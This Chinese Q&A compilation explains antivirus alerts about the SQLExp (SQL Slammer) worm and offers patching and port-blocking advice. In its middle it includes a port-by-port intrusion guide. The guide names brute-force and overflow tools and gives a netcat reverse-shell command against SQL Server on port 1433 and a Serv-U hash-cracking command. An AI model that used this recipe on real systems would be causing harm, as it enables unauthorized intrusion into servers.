计算机杀毒软件总是提示有信息成功拦截 1个 针对本机的SQLExp攻击

呵呵,你把它的监控调到高级别了吧,建议调到中,那些接收数据包的就没有的,而那些SQLExp攻击是针对网吧等数据库的,对我们一般的家用户是没威胁的,放心就好,

SQLExp是什么文件,为什么黑客老攻击它如题 谢谢了

“蠕虫王”是一个极为罕见且极其短小的蠕虫病毒，英文名为Worm.SQLexp.376，主要通过 Microsoft SQL Server的漏洞发动攻击，极具破坏力。 蠕虫王蠕虫病毒仅在内存中传播，没有文件载体，其长度仅有376字节。但其传播速度 极快，且使用广播数据包方式发送自身代码，每次均攻击子网中所有可能存在机器。易受 “蠕虫王”攻击的机器类型为所有安装有Microsoft SQL Server 2000并且没有修补漏洞的 NT系列服务器，包括WinNT/Win2000/WinXP等，不会感染Win9X系统。由于蠕虫王并不对是 否已经侵入系统作判定，所以其不停的入侵将会造成拒绝服务式攻击，从而导致被攻击机 器因瘫痪而停止服务，危害极为惊人。

为什么攻击我的电脑SQLExp?

防火墙只是根据端口来辨别攻击的.这通常不准确,所以应该是对应端口被攻击而已.而防火墙把所有不符合规则的数据包都称之为攻击,有时这些攻击其实就是正常的数据包.

怎么解决SQLexp被攻击？

只开放必要的端口，关闭其余端口.因为在系统安装好后缺省情况下,一般都有缺省的端口对外开放，

黑客就会利用扫描工具扫描那些端口可以利用，这对安全是一个严重威胁。

端口 协议 应用程序

　 21 TCP FTP

　 25 TCP *** TP

　 53 TCP DNS

　 80 TCP HTTP SERVER

　 1433 TCP SQL SERVER

　 5631 TCP PCANYWHERE

　 5632 UDP PCANYWHERE

　 6（非端口） IP协议

　 8（非端口） IP协议

将下面的端口关闭

TCP

　 21

　 22

　 23

　 25 TCP *** TP

　 53 TCP DNS

　 80

　 135 epmap

　 138 [冲击波]

　 139 *** b

　 445

　 1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b

　 1026 DCE/12345778-1234-abcd-ef00-0123456789ac

　 1433 TCP SQL SERVER

　 5631 TCP PCANYWHERE

　 5632 UDP PCANYWHERE

　 3389

　 4444[冲击波]

　 4489

　 UDP

　 67[冲击波]

　 137 netbios-ns

　 161 An SNMP Agent is running/ Default community names of the SNMP Agent

端口入侵：

1. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破（字典是关键）

最后 SQLTools.exe入侵

=============================

对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

（以上反向的，测试成功）

sqlhelloz.exe 入侵ip 1433 （这个是正向连接）

2. 4899端口入侵

用4899过滤器.exe，扫描空口令的机器

3. 3899的入侵

对很早的机器，可以试试3389的溢出(win3389ex.exe)

对2000的机器，可以试试字典暴破。(tscrack.exe)

4. 80入侵

对sp3以前的机器，可以用webdav入侵；

对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）

可以利用SQL进行注入。（小榕的注入软件）。

5. serv-u入侵(21端口）

对5. 004及以下系统，可用溢出入侵。（serv5004.exe）

对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）

======================================

对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs）

输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码。如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，

进行溢出入侵。

9. 3127等端口

可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。

10. 其他入侵

利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。

金山毒霸：成功拦截一个针对本机的SQLExp攻击 什么意思？

一般来说是 利用电脑 的SQL漏洞进行攻击，只要打上补丁，把漏洞补上就可以了

急急急~~电脑高手进.SQLExp病毒是怎么回事

SQLEXP是“蠕虫王”

“蠕虫王”蠕虫文档:

病毒名称：Worm.SQLexp.376

危险级别：中

破坏性：中

传播速度：高

病毒特征：蠕虫王蠕虫病毒仅在内存中传播，没有文件载体，其长度仅有376字节。但其传播速度极快，且使用广播数据包方式发送自身代码，每次均攻击子网中所有可能存在机器。该蠕虫攻击安装有Microsoft SQL 的NT系列服务器，该病毒尝试探测被攻击机器的1434/udp端口，如果探测成功，则发送376个字节的蠕虫代码。1434/udp端口为Microsoft SQL开放端口。该端口在未打补丁的SQL Server平台上存在缓冲区溢出漏洞，使蠕虫的后续代码能够得以机会在被攻击机器上运行进一步传播。由于蠕虫王并不对是否已经侵入系统作判定，所以其不停的入侵将会造成拒绝服务式攻击，从而导致被攻击机器因瘫痪而停止服务，危害极为惊人。

历来以对数据保护完整性著称的SQL Server数据库居然也存在漏洞，并被黑客利用，这大大出乎人们的意料之外。2003年1月25日爆发的Win32.SQLExp.Worm蠕虫病毒带给我们的启示是多方面的。归根结底，这又是一次由微软系统的漏洞引发的互联网危机。

趋势科技总裁张明正先生曾经预言：全球每18个月就会有一种影响巨大的恶性病毒发生。2003年1月25日爆发的影响全球80%网民上网的Win32.SQLExp.Worm蠕虫病毒，相距2001年7月份给全球信息系统带来深重灾难、并从此改写病毒发展历史的红色代码和Nimda病毒，正好整整18个月！

SQLExp曾经导致中国 *** 在2003年大面积瘫痪，专杀工具没什么，打好补丁就可以了。

相关的微软补丁下载地址为：http://www.microsoft.com/Downloads/Release.asp?ReleaseID=40602

针对本机的SQLExp攻击，“蠕虫王”病毒名称：Worm.SQLexp.376

应该说你的电脑没事 你按的是金山吧.那已经被拦截了

这是你所处的那个局域网内有病毒或工具在扫描你

相关的知识：

SQLExp攻击是什么攻击?

“蠕虫王”蠕虫文档:

病毒名称：Worm.SQLexp.376

危险级别：中

破坏性：中

传播速度：高

病毒特征：该蠕虫攻击安装有Microsoft SQL 的NT系列服务器，该病毒尝试探测被攻击机器的1434/udp端口，如果探测成功，则发送376个字节的蠕虫代码。1434/udp端口为Microsoft SQL开放端口。该端口在未打补丁的SQL Server平台上存在缓冲区溢出漏洞，使蠕虫的后续代码能够得以机会在被攻击机器上运行进一步传播。

病毒查杀防护

1,直接下载微软指定的补丁程序 或者 安装Microsoft SQL Server 2000 SP3。

2,在防火墙或者路由器上阻塞外部对内的和内部对外的UDP/1434端口的访问。

3,如果由于DoS导致系统反映慢，可先断开连接，然后在Windows任务管理器里强行终止进程SqlServr.exe，打上相应补丁并重新启动服务.

拦截针对本机的SQLExp攻击, 来自 218.64.237.146

看看是在哪个端口的

然后把端口屏蔽了就可以了

我也经常碰到扫描我SQL的嗅探。一般在路由器上查到是哪个端口

然后再在本地IP安全策略里封了端口就可以了。